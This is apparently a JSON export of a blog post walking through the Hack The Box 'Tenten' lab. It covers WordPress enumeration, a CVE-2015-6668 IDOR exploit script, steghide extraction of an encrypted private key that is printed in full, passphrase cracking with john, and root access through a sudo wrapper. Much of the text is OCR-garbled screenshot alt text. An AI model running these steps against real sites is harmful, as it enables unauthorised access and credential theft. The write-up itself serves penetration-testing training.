{"id":58,"date":"2021-02-13T19:17:01","date_gmt":"2021-02-13T19:17:01","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=58"},"modified":"2021-02-13T19:17:23","modified_gmt":"2021-02-13T19:17:23","slug":"htb-tenten-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/13\/htb-tenten-walkthrough\/","title":{"rendered":"HTB &#8211; Tenten Walkthrough"},"content":{"rendered":"\n<p>nmap<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/xipqZc8SxTXDUBAGpJAvjNQmo-OQr-tprm4LszjUCPsRUyuFMer28mIjTFkE6vg0MNXtVqlIPVDTliCi-ckEY4UaJrKC--S-qFwKRSeRKy8MnGsMt_JJ5p_z0zEr8iQaL5-z1bAk\" alt=\"Not shown: 998 filtered ports \nPORT STATE SERVICE VERSION \n22\/tcp open ssh \nOpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; \nI ssh-hostkey: \n2048 (RSA) \n256 (ECDSA) \n256 (ED25519) \n80\/tcp open http \nApache httpd 2.4. 18 ( (Ubuntu)) \nI http-generator: WordPress 4.7.3 \nI http-methods: \nSupported methods: GET HEAD POST OPTIONS \nI http-server-header: Apache\/ 2.4. 18 (Ubuntu) \nI http-title: Job Portal &#8211; Just another WordPress site \nService Info: OS: Linux; CPE: kernel \nprotocol 2.0) \"\/><\/figure>\n\n\n\n<p>WPScan &#8211; enumerate users<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/FF-3zPoP0vXq02CukM69EdI93Rqa-FVxtmLRD_Mg6TU2boIAinKDGc79ERCMWYqDuAsmST8uUknsTXqrGxdzKys-D24RVA8t6qzU6IAcOJgcfuYnw28QYdbP8RegMlzzk80kBrfz\" alt=\"wpscan \n--url http:\/\/10.10.10.10 \n-log \n--enumerate u \nNOTE: Gem.gunzip is deprecated; use Gem: : Util.gunzip instead. It will be removed on or after 2018-12-01. \nGem. \ngunzip called from \/usr\/lib\/ruby\/vendor ruby\/ unicode\/display width\/ index. rb:5. \nThe supplied log file \/ root\/ .wpscan\/log.txt already exists. If you continue the new output will be appended. \nDo you want to continue? 
[Y les [N]o, default: [N] \nWordPress Security Scanner by the WPScan Team \nVersion 2.9.4 \nSponsored by Sucuri \nhttps:\/\/sucuri.net \n@ WPScan , @ethicalhack3r, @erwan I r, @ FireFart \nIt seems like you have not updated the database for some time \nLast database update: 2019-03-18 \nDo you want to update now? [Y les [NIO [A] bort update, default: \nUpdating the Database . \nUpdate completed \nURL: http:\/\/10.10.10.10\/ \nStarted: Sat Jul 6 2019 \nInteresting header: LINK: <http:\/\/10. 10. 10. 10\/ index.php\/wp-json\/&gt;; \nInteresting header: SERVER: Apache\/ 2.4. 18 (Ubuntu) \nXML-RPC Interface available under: http:\/\/10.10.10. 10\/xmlrpc.php \nFound an RSS Feed: http:\/\/10.10.10. 10\/ index.php\/feed\/ \n[HTTP 200] \nDetected 1 user from RSS feed: \nI Name I \nI takis I \nrel=&quot;https : \/\/ api . w. org\/&quot; \n[HTTP 405] \"\/><\/figure>\n\n\n\n<p>WPScan &#8211; Plugin Vulnerability (IDOR) found<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/gC72dTqJNOkvybyec4ah9qgGJPIrNIuE9Xo-MHYCxokQfFdaMfxx9Qu8eSEGb-CrE8SrTCOtxDoQUGaEv1hOI50KsBBNQSvPPwFQkZfqG8chVowzNSECiBm2NkCS-Lb4Hcq6pzKo\" alt=\"[+] Enumerating plugins \n| 1 plugin found: \nfrom passive detection . \nv7.2.5 \nName: job-manager - \nLatest version: O. 7.25 (up to date) \nLast updated: \nLocation: http:\/\/10. 10. 10. 10\/wp-content\/plugins\/job-manager\/ \nReadme: http:\/\/10. 10. 10. 10\/wp-content\/plugins\/job-manager\/readme. txt \nTitle: Job manager <= O. 7.25 \nInsecure Direct Object Reference \nReference: https:\/\/wpvulndb.com\/vulnerabilities\/8167 \nReference: https:\/\/vagmour.eu\/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin\/ \nReference: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2015-6668 \nEnumerating usernames . 
\nWe identified the following 1 user: \nI ID I Login I Name \nIl \nI takis I takis \nJob I \"\/><\/figure>\n\n\n\n<p><a href=\"https:\/\/vagmour.eu\/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin\/\">https:\/\/vagmour.eu\/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin\/<\/a><\/p>\n\n\n\n<p>As the PoC explained in the above URL, I tried to upload CV files first<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/b6mNtrOWbh01y9sk_S-mmFWV3xkgjg-Kge5nQJEvaMo7XP_omTE_R9bP0Kik8st3yvS8XtOm0DX8zt8PLvHs15c1yKgC6Du-FEbrtC9LHTj_xhw_lYvY-_DvoJBuWs8JVsZfkv-J\" alt=\"Request \nRaw Para ms \nCan tent \nCan tent \nCan tent \nCan tent \nHeaders \nHex \nResponse \nRaw Headers \nETT?\/I.1 200 0K \nHex \nHTML \n(Ubuntu} \nRe nder \nfarm-data; iab:nan -field-Il&quot; \nfarm-data; iab:nan -field- It&quot; \nfarm-data; iab:nan -field-15&quot; \nSat, 06 Jul 201g \nServer: Apache\/ 2 . Z. 18 \nVary: Accept -Encoding \nContent -Length: \nCannectian: c lase \nfield-16&quot; \nfilename=&quot; \n$7 WOE \nCan tent - iType: text\/ html; charset=L1iT? \u20228 \nhtml &gt; \nCht:nl lang=&quot; en \u2022US&quot; na \nChead;\u2022 \n-width, \nClink href=&quot;http: \/\/g.mpg . arg\/xfn\/ll&quot;;\u2022 \n\u2022:script;\u2022 (function (html} Chtm1.c1assName = \ninitial-scale=l \nfarm-data; iab:nan - \nCan tent - 'Type i:nage\/png \ntb . png \ntd$ \nhtml . className . replace ( \/\\bno -js\\b\/, \u2022 j s \u2022 (document . documentE1ement} ; \nApplication Job \n< \/ script* \nz \ng \nc \nIy \nz \n1 \nkw \nw \n3 \nc \ndwxS \n5. \nh \n6 \n1 \nz \n\/ nyt} : A \ncYhJ7a a \nEh ya \n6 y El # \nc \n3 \n8 \n6 \n1 \nshh \ndns \u2022prefetch' href=' \/ \/ fan t s. gaagleapis. cam' \ndns\u2022prefetch' href=' \/\/ s. w. arg' \/;\u2022 \nhttpg: \/\/ fants.gstatic. cam' crassarigin rel='precannect' \nalternate&quot; type=&quot; title=&quot; \nhref=&quot;http: \/\/ 10. 10. 10. 10\/ index. 
php\/feed\/&quot; \/;\u2022 \nalternate&quot; type=&quot; title=&quot; \nClink \nClink \nClink \nClink \nClink \nrel=' \nrel=' \nhref= ' \nre \nre \nJOE Part al \nJOE Part al \n\u2022ragua ; \n\u2022ragua ; \nFeed&quot; \nFeed&quot; \nOKU + \nz \ng \na \nr \nk \ngEJ \n17 \n3 \n5 \n6 \nf CeGW E \nx \ng \nh \nCib \nG \nPer e- \n7 \ng \n7 \n\\ 1 zOM \nytE1 .:SW \n00. \nhref=&quot;http: \/\/ 10. 10. 10. 10\/ index. \/;\u2022 \n\u2022:script type=&quot; text\/iavascript&quot;;\u2022 \nwindow._wpemoj i Settings = \nC &quot;baseUr1&quot; &quot;https. \\ \/ \\ \/ s . w. i 1\/2 . 2 . , &quot;ext&quot; . png&quot; , svgUr1&quot; &quot;https \n\\ \/ \\ \/ s . w. i 1\/2 . 2. , svgExt&quot; . svg&quot; , source&quot; C &quot;concatemoj i&quot; &quot;http \n10 . 10 . 10\\\/wp - includes\\\/j s \\ \/ wp -emoj i -release . min. j 7 . 3&quot; ; \nfunction (a, b, c} [function d (a} [var \nb , c , d, e , f=String. fromCharCode ; if kl I k. fill Text} return! 1 ; switch (k. clearRect O , O , j . width, j . heig \nht} , k. , k. 32px Arial&quot; , a} [case&quot; flag&quot; \u2022 return \nk. fillText (f (55356, 56826, 55356, 56819} , O, , . toDataURL U . length<3e3} (k. (0, o, j . widt \nh,) . height} , k. fillText (f (55356, 57331, 65039, 8205, 55356, 57096} , O, , . toDataURL , k. \n, o, j . width, j . height} , k. fillText (f (55356, 57331, 55356, 57096} , O, , . toDataURLU , h \n; case &quot;emo \nj i4&quot; I return \nk. fillText (f (55357, 56425, 55356, 57341, 8205, 55357, 56507} , O, . toDataURLU , k. clearRect o, j . w \nidth,j . height} , k. fillText (f (55357, 56425, 55356, 57341, 55357, 56507} , O, , . toDataURL \nurn! 1} function e [var \nc=b . createE1ement script&quot; ; c . src=a , c . defer=c . type=&quot; text\/ javascript&quot; , b . getE1ementsByTagName ( &quot;he \netl \notJl \nDone \n1 \nib \nK \nk \nGlh \n1 \nad&quot;} [01 . appendChi1d (c} y var \n=b createE1ement (&quot;canvas&quot;} \nType a search \nterm \nO matches \nType a search \n, . . 
getContext ; for i=Array flag&quot; , &quot;emoj \nterm \n54.877 bytes \nO matches \n1.881 mills \"\/><\/figure>\n\n\n\n<p>Since WordPress saves uploaded files as \/wp-content\/uploads\/{year}\/{month}\/{file name}<\/p>\n\n\n\n<p>I checked whether the file I uploaded exists there, and yes, it&#8217;s uploaded<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/h_Ubq-bXBiPcr01hkXESZL9vVx6TR7cq1bJmUHWDECvGWreVO1-6INT81BdH1ec9SOA6g6QFpfIEiDVAy6Ff9K0b_pyIX1hRtGmAOjcjisxczkI-6dbCWatra3g4s0qmK6XWi3t4\" alt=\"10.10.10.10 \n\/wp-content\/uploads\/2019\/07\/htb.png \"\/><\/figure>\n\n\n\n<p>Also, in the HTML code of the application page, I observed that the uploaded application name appears<\/p>\n\n\n\n<p>I brute forced the application page IDs (the IDOR vulnerability) and an interesting application name appeared<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/0-69VuK5gvKDsiz261J4XcylAfawGi9OJz3nkt8NB-zXAFq3SXoKVnv3kYGzILCt_aS2JgliRLRuROd3MC54HXKXQBfhqcyFwVUmlJs2wiZJrKIQgZv323Zhdva1RFaB1_PI41lp\" alt=\"curl -s http:\/\/10.10.10. 10\/ index.php\/jobs\/apply\/8\/ I grep \n<title&gt;Job Application: Pen Tester &#8211; Job \nfor i in $(seq 1 20); do echo -n \n, curl -s http:\/\/10.10.10. 10\/ index.php\/jobs\/apply\/$i\/ I \ngrep \ndone \n1: \n2: \n3: \n4: \n5: \n6: \n7: \n8: \n9: \n11: \n12: \n13: \n14: \n15: \n16: \n17: \n18: \n19: \n20: \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \n<title&gt;Job \nApplication : \nHello world! 
&#8211; Job Portal<\/title&gt; \nApplication : \nSample Page &#8211; Job \nApplication : \nAuto Draft &#8211; Job \nApplication \n&#8211; Job \nApplication : \nJobs Listing &#8211; Job Portal<\/title&gt; \nApplication : \nJob Application &#8211; Job \nApplication : \nRegister &#8211; Job Portal<\/title&gt; \nApplication : \nPen Tester &#8211; Job \nApplication : \n&#8211; Job Portal<\/title&gt; \nApplication : \nApplication &#8211; Job \nApplication : \ncube &#8211; Job \nApplication : \nApplication &#8211; Job \nApplication : \nHackerAccessGranted \nApplication : \nApplication &#8211; Job \nApplication : \nhtb &#8211; Job Portal<\/title&gt; \nApplication : \nApplication &#8211; Job \nApplication : \nhtb &#8211; Job Portal<\/title&gt; \nApplication \n&#8211; Job \nApplication \n&#8211; Job \nApplication \n&#8211; Job \nroot@kati : \/home\/kaIisa\/HTB\/tenten# \"\/><\/figure>\n\n\n\n<p>One can also do the brute force via Burp Intruder<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/YVeGI0yeaqb5ULsaPx2r-G-fSAOkdJAPTJRtjtbGCKXN06sMYlrBBEnkES7rtierYxTF8uReCLWVZPnHnCIV0A-Kpc_V-Y5ubgsjuYGZpqYtpEtZgfbYr9zgzf5JtqEhcC2QADnt\" alt=\"Attack Save Columns \nResults Target Positions \nFilter: Showing all Items \nPayload \nRequest \nPayloads \nRender \nOptions \nStatus \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \n200 \nError \ninitial \nTimeout \n1 \n2 \n3 \n4 \n5 \n6 \n7 \n8 \n9 \n10 \n11 \n12 \n13 \n14 \n15 \n16 \n1 \n2 \n3 \n4 \n5 \n6 \n7 \n8 \n9 \n10 \n11 \n12 \n13 \n14 \n15 \n16 \nLength \n57855 \n57857 \n57854 \n57839 \n57748 \n57850 \n57865 \n57847 \n57855 \n57810 \n57860 \n57844 \n57862 \n57906 \n57748 \n57748 \n57748 \nRequest Response \nRaw Headers Hex \nETT?\/I.1 200 0K \nSat, 06 Jul 201g \nServer: Apache\/ 2 . a. 18 (Ubuntu} \nVary: Accept \u2022Encoding \nContent-Length: 57713 \nCannectian: c lase \nCan tent - iType: text\/ html; charset=L1iT? 
\u20228 \nCht:nl lang=&quot; en \u2022US&quot; class\u2014Una-is na\u2022svg&quot;;\u2022 \nChead;\u2022 \n-width, \nClink href=&quot;http: \/\/gmpg.arg\/xfn\/ll&quot;;\u2022 \n\u2022:script;\u2022 (function (html} Chtm1.c1assName = html. className.rep1ace \nComment \n(document . documentE1ement} ; \nc\/ script* \nClink \nClink \nClink \nClink \nClink \nrel=' \nrel=' \nhref= ' \nre \nre \nApplication. HackerAccessGrantedl Job \nPortal&quot; title* \ndns \u2022prefetch' href=' \/ \/ fan t s. gaagleapis. cam' \ndns\u2022prefetch' href=' \/\/ s. w. arg' \/;\u2022 \nhttpg: \/\/ fants.gstatic. cam' crassarigin rel='precannect' \nalternate&quot; type=&quot; application\/ rss+x.ml&quot; title=&quot; \nalternate&quot; title=&quot; \nJab Part al \nJOE Part al \n\u2022ragua ; \n\u2022ragua ; \ncc ript \nC&quot;baseUr1&quot; &quot;https, \ntype=&quot; text\/ iavascript&quot;;\u2022 \nwindow._wpemoj i Settings = \nw. \\ \/emoj i \\ \/ 2 . 2 . \n11\/721721\/&quot; , &quot;ext&quot; \nPeed&quot; href=&quot;http: \/\/ 10. 10. 10. 10\/ index. php\/feed\/&quot; \/;\u2022 \nPeed&quot; href=&quot;http: \/\/ 10. 10. 10. 10\/ index. \/;\u2022 \n. png&quot; , svgUr1&quot; &quot;https. \\ \/ \\ \/ s . w. i \\ \/ 2 . 2. , svgExt&quot; . svg&quot; , source&quot; C &quot;concatemoj i&quot; &quot;http \n10 \"\/><\/figure>\n\n\n\n<p>I used the PoC exploit in the blogpost above and modified the exploit a bit as below:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/6pE_qMzxsW3pc8Zzi65GvpcT9WL67qYqpldWCcFm2fxLK5lbscefgR3NI1DhS7okRGEpqHSj-APvbSZb9qd9oHY4UGLpVb8RmHnnQi6UdOkDDp4MQD7dIGTQU8oQZpaQTKPvq7Yz\" alt=\"import requests \nprint \nCVE-2015-6668 \nTitle: CV filename disclosure on Job-manager WP Plugin \nAuthor: Evangelos mourikis \nBlog: https:\/\/vagmour.eu \nPlugin URL: http:\/\/www.wp-jobmanager.com \nVersions: \n\u00ab=0.7 .25 \n= raw input( 'Enter a vulnerable website. \nwebsite \n= raw input( 'Enter a file name. 
\nfilename \nfilename2 \n= filename. replace( \nfor year in \nfor i in \n, 'gif' , 'pngl}: \nfor extension in {'doc' , 'pdf' , 'docx' , ' \njpg' , ' jpeg' \nURL = website + &quot;\/wp-content\/uploads\/&quot; \n+ str(year) + + \n. format (i) + \n+ filename2 + \n\u2022 + extension \nreq = requests. get (URL) \nif req. status \nprint [+] URL of CV found! \n+ URL \"\/><\/figure>\n\n\n\n<p>And found a file with the name HackerAccessGranted<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/gNa7m2zHPe3AStojuFOfS1u0G1qVZk2KCxA8J_ItNwrQEU069PG9G2c_iEp4gl5VnORONlNJDzL8o5GlPXsXnLoa0Kt9dyCoD3W1qdV_LsHGJqZ2RFGTc8uJJ1yNCib5H__NzT8l\" alt=\"python cve-2015-6668.py \nCVE-2015-6668 \nTitle: CV filename disclosure on Job-manager WP Plugin \nAuthor: Evangelos mourikis \nBlog: https:\/\/vagmour.eu \nPlugin URL: http:\/\/www.wp-jobmanager.com \nVersions: \nEnter a vulnerable website: http:\/\/10.10.10.10 \nEnter a file name: HackerAccessGranted \n[+] URL of CV found! http:\/\/10. 10. 
10\/wp-content\/uploads\/2017\/04\/HackerAccessGranted.jpg \"\/><\/figure>\n\n\n\n<p>I downloaded the jpg file and checked it for hidden information with the following tools<\/p>\n\n\n\n<p>strings HackerAccessGranted.jpg | less<\/p>\n\n\n\n<p>exiftool HackerAccessGranted.jpg<\/p>\n\n\n\n<p>binwalk HackerAccessGranted.jpg<\/p>\n\n\n\n<p>steghide --extract -sf HackerAccessGranted.jpg (-sf selects the stego file to extract from)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/g8wdVjthm7M7zlEUOhPt91N8SghrOtjNrFd2ORRYwfWHZ5spQg433UtHNxmuPm2jC-cwqtq5zJFK9pKE0dH2gXONOLm472g7nmbTwGAkNA-eWSwHl3COpeepjkkMGitJk_pITARX\" alt=\"extracting options: \ns f, --stegofile \n-sf <filename&gt; \np, - -passphrase \n-p <passphrase&gt; \nxf, --extractfile \n-xf <filename&gt; \nf, -- force \nq, --quiet \nv, --verbose \nselect stego file \nextract data from \nspecify passphrase \nuse <passphrase&gt; to extract data \nselect file name for extracted data \nwrite the extracted data to <filename&gt; \noverwrite existing files \nsuppress information messages \ndisplay detailed information \noptions for the info command: \np, - -passphrase \n-p <passphrase&gt; \nspecify passphrase \nuse <passphrase&gt; to get info about embedded data \nTo embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt \nTo extract embedded data from stg. jpg: steghide extract -sf stg. jpg \nsteghide \n--extract -sf HackerAccessGranted.jpg \nEnter passphrase: \nwrote extracted data to &quot;id rsa&quot; . 
\"\/><\/figure>\n\n\n\n<p>Look the content of id_rsa file<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/JX_EwM0TWNch_4EYc1EOhoD-2elhR27C_6w5xThrYBh9vNi1p-kltfPFDNhN-j0GiX1-YARLwZczCQaON3uy7VrXGg0OsDRZFmm6d79lZqc1M5Hb87bnH1oUdP4lbnmorTlrGfUN\" alt=\"-BEGIN RSA PRIVATE KEY----- \nProc-Type: 4,ENCRYPTED \nDE-K-lnfo: AES-128-C8C, 7265FC656C429769E4CIEEFC618E660C \n\/HXcU80T3Jhzb1H7uF9Vh7faa76XH1dr\/ChOpDnJunjdmLS\/1aq1ku1Q3\/RF\/Vax \ntj Tzj \/V5h8EcL5GcHv3es romsoj rkpawfbvwbR+XxFIJuz7zLfd\/vDo \n1KuGrCrRRsipkyae5Kiq1C137bmWK9aE\/4c5X2yfVTOEeODdWOrAoTzGufWtThZf \nK2nyOiTGPndD7LMdm\/0505As+ChDYFNphVIXDgfDzHgonKMC4iES7Jk8Gz20PJsm \nSdWCazF6p1Eqh14NQrnkd8kmKqzkpfWqZDz3\u00e6g6f49GYf97aM5TQgTday20FqoXH \nWPhK3CmOtMGqLZA01\u00e6oNuwXSOH53t9FG7GqU31wj7nAGW8pfGodGwedYde4z108P \nVbNu1RMKOkErv\/NCiGVRcK6k5Qtdbwforh+6bmjmKE6QvMXbesZtQOgC9SJZ31MT \nJOIY838HQZgOsSw1jDrxuPV2DUIYFROW3kQrDVUym080xOwOf\/MITxvrC2wvbHqw \nAAniuEotb90az\/Pfau300\/DVzYkq199VDX\/Y81xd168qqZbXsM9s\/aMCdVg7TJ1g \n2gxE1pV7U9kxi1\/RNdx5UASFpvFs1mOn7CTZ6N44xiatQUHyVINgpNCyjfEmzxmo \n6FtWaVqbGStax1iMRC198ZOcRkX2VoTvT1hQw74rSPGPMEH+OSFksXp7Se\/wCDMA \npYZASVx160NWQGpAj5z4Wha8S8Er8ZVmFfykuh4107Tsnxa9WNoWX06XOFSOPMk \ntNp8bPPq15+M+dSZaObad9E\/mnv8faSKlvkn4epk87nOVk01ssLcecfxi+bWnGPm \nKowyqU6iuF28w1J98towgnWrUgt1qubmkOwkf+108ig7komyT9KfZegR70F92xE9 \n41WDTxfLy7501DHORrmOf77D4HvNC2qQOdYHkApd1dk4b1cb71Fi5WF183RruygF \n2GSre8yXn5g915Ya82uC30+ST5Q8eY2pT88k2D61kmt6u11LnoOSkr3v9r6JT5J7 \nLOUtmgdUqf+35\u00e6cA70L\/w11POE04UOaaGpscDg059DL88dzv1hyHg4T1fd9xWtQS \nVxmzURTwEZ43j SxX94PL lwcxzLV6FfRVAKdbi6kACsgVeULi1+YAfPj 11yVOm1kv \n5HV\/bYJvVatGtmkNumtuK7NOH8iE7kCDxCnPnPZaOnWoHDk4yd50R1zznkPna74r \nXb09FdNeLNmER\/7GGdQARkpd52Uur08f1JW2wyS1bdgb8gw\/G+puFAR8z7ipgj4W \np9LoYqiuxaEbiD5zUzeOtKAKL\/nfmzK82zbdPxmrv7TvHUSSWEUC409QKi83amgf \nywmjw30tH+ZLn8my\/fS61VQ50nV6rVhQ7+LRKe\u00e6q1Yidzfp1911L8Uidbs8fWAz8 
\n9XkOsH5c1NQT6spo\/nQM3UN1kkn\u00e6a7zKPJmetHs040b3xKLiSpw5f35SRV4rF+mO \nv1UE1\/YssXM07TK6i81XCuuOUtOpGiLxNVR1aJvbGmazLWCSyptk5fJhPLkhuK+J \nYoZn9FNAuRiYFL3rw+6q01+KoqzoPJJek6WHRy80SE+8Dz1ysTLIP86tGKn7EWnP \nEND RSA PRIVATE KEY----- \nid r sa (END) \"\/><\/figure>\n\n\n\n<p>Since it&#8217;s encrypted, we need to decrypt it first to use it<\/p>\n\n\n\n<p>Turn the file into john crackable form with sshng2john tool<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/8uPtIIqeM3h9d3I5vRqqlwSlfM7xeC0KbIkqadbFp8W2U2t5ZtGzsgkj5nZnJGpuQgvHCjo9Tn07aEOy0jBnW0F3k0wK034xBqCSUzeYxjIiuXq3qXKevyNTbaleUPivTBOmj4BR\" alt=\"python sshng2john.py id rsa &gt; id john \ncat id john \n16 \nid rsa:$sshng$1$16$7265FC656C429769E4CIEEFC618E660C$1200$fc75dc501393dc98736e51fbb85f5587b7da6bbe971c876bfc2874a439c9ba78dd98b4bf95aab592e950dff445fd56b1b634f \n38ff5798411 \n8eOdd5b4acOa 13cc6b9f5ad4e 165f2b69f2d224c63e7743ecb3 \n9262aace4a5f5aa643cf7faoe9fe3d1987fdeda3394d081375acb6a05aa85c758f84adc29b4b4c1aa2d9034d7ea0dbb05d2d07e77b7d146ec6a94df5c23ee7006581a5f1a8746c1e75875ee3394e04 \n16de442bOd55329 \nb4068c4ecOe7ff3254f1bebOb6c2f6c7ab00009e2b84a2d6fda1acff3df6aedce3bfOd5cd892a23df550d7fd8048c5dd7af2aa996d7bOcf6cfda30275583b4c9d60daOc4496957b53d9318a5fd135d \nc79500485a6f16c9663a7ec24d9e8de38c626ad4141f2575360a4dOb28df10ccd7328e85b56695a9b192b5ac7588c442d7df19d1c4645f65684ef4e5850c3be2b48f18f3041fe392164b17a7b49eff \n0083300a58640495c65ea835640afa9023e73e1685a052044afc6559857f292e878968ed3b27c5af56368597a3a5f415238f324b4da416cf3ead79f8cf9d49968e6da77d13f327bc17da48a96f927e \nlea6407b9f45643b5b2c2dc79c7f lee817ddb 113de085834f 17cbcbbe68d43 \n1292bde \nff6be894f927b2f452d320754a9ffb7e7e700ef42ffc0894fd04d3853469a1a9b1cOeOd39f432fcf1dcef221c878384e57ddf715ad4125713335114f0119e378d2c57f783cb970731ccb57a15f4550 
\nOa75b8ba9000ac8157942e223ec807cf8c82325749b592fe4757f6d826f55ab46b6690db8cb6e2bb34e1fc884ee4083c429cf9cf65ad275a81c3938c9de74465cf39e43e76bbe2b5dba3d15d35e2cd \n98447fec619d400464a5de7652eaf4f 11b883e7353378eb4aOOa2ff9df9b32bcdb36dd3f 132bbfb4ef Id449258450 \n1355448689bdb la66b32d6092ca9b64e5f2613cb921b8af89628667f45 \n340b9189814bdebc3eeaaa25f8aa2ace83c925e93a587472foe484fbc0f3d72b132c83c1ead18a9fb1169cf \nroot@kati : \/home\/kaIisa\/HTB\/tenten# \"\/><\/figure>\n\n\n\n<p>Then crack the passphrase<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/fqtNBGVe-S5M0oD8QI0KNmOZfpAE0tYIIf8UeK8Z_ffDVOtATFS_QsnKpTLIWcJZ5yILcmxcFr1en183fE7wzPQEp7Zc7beMuGHG5l9M09E8M2UKeH0cf0k_MIjMS2X5CUrkc6Nr\" alt=\"john id john --wordlist=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8 \nLoaded 1 password hash (SSI-I [RSA\/DSA\/EC\/OPENSSH (SSI-I private keys) 32\/32]) \nCost 1 (KDF\/cipher [O=MD5\/AES 1=MD5\/3DES 2=8crypt\/AES]) is O for all loaded hashes \nCost 2 (iteration count) is 1 for all loaded hashes \nWill run 4 Openmp threads \nNote: This format may emit false positives, so it will keep trying even after \nfinding a possible candidate. \nPress 'q' or Ctrl-C to abort, almost any other key for status \nsuperpassword \n(id rsa) \"\/><\/figure>\n\n\n\n<p>Change the permissions of the key file to 600 and log in as the takis user with the cracked passphrase<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/f4XapZTVpYL-EfWbzkRQslRG9HbV3OtT7v3-3KaJJUV-Jk89h721ntX_53XHErpyT7xwY4VLWVQZL53No6D3yFV01F1sZD-DTCk2NNFx_H4-iguaqTZDx13ym9LVUrd9YgSi9k2w\" alt=\"chmod 600 \nid rsa \nssh -i id \nr sa takis@10.10.10.10 \nEnter passphrase for key 'id rsa' : \nWelcome to Ubuntu 16.04.2 L TS (GNU\/ Linux 4.4.0-62-generic x86 64) \n* Documentation: \n* management: \n* Support: \nhttps:\/\/help . ubuntu . com \nhttps \/\/ landscape . canonical . 
com \nhttps : \/\/ubuntu . com\/advantage \n65 packages can be updated. \n39 updates are security updates. \nLast login: Fri may 5 2017 \ntakis@tenten : \u2014$ \"\/><\/figure>\n\n\n\n<p>Priv Esc<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/qTaxa_ribLqX56OanpaOLvti_zwBKJH-5Q6f0FkKIhqED5Ge9_SxHCI3hCM8WDC5k9Nop5U1yu3SwgMub3P6ORU3o1tjzpzRMXomESp9OFfcfhaQQ1CzRNOfY_N1TQRCeb4i3m-S\" alt=\"takis@tenten:\u2014$ sudo -l \nmatching Defaults entries for takis on tenten: \nenv reset, mail badpass, secure \nUser takis may run the following commands on tenten: \n(ALL : ALL) ALL \n(ALL) NOPASSWD: \/bin\/fuckin \"\/><\/figure>\n\n\n\n<p>So the takis user can run \/bin\/fuckin as root without a password<\/p>\n\n\n\n<p>The content of the file can be seen below; it takes its arguments and executes them<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/tsGodnqdwOmyE64MctC-aY8OPIuNJfME8I6tH23JZ4w67MOoHOX1oZS4zfbo6iGq3n5Mm7l_mkCHF-XRENsokxwut9LqsQiNosup-JRrx-PRo4ievvFyRVlU7ZX5Pr6-bdRqBTDy\" alt=\"\/ bin\/ bash \n\/bin\/fuckin (END) \"\/><\/figure>\n\n\n\n<p>We run sudo \/bin\/fuckin bash and become root<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/yX_sMRTfGGUrgpJnHhGtAFv05RutKqJv4N_BjSTL6dD0DF23qNohC4eDlvgMEFI0RUqUlYJrwrYpfyaV7VOv2TK9vr2yBalI_gMjxMQ7snPA6HUnXl7c31lWFhnpaS8RmE4SLO1B\" alt=\"takis@tenten:\u2014$ cat \/bin\/fuckin \n\/ bin\/ bash \ntakis@tenten:\u2014$ sudo \/bin\/fuckin bash \nwhoami \nroot \nroot@tenten : \"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>nmap WPScan &#8211; enumerate users WPScan &#8211; Plugin Vulnerability (IDOR) found https:\/\/vagmour.eu\/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin\/ As the PoC explained in the above URL, I tried to upload CV files first Since wp saves the uploaded files as \/wp-content\/uploads\/{year}\/{month}\/{file name} 
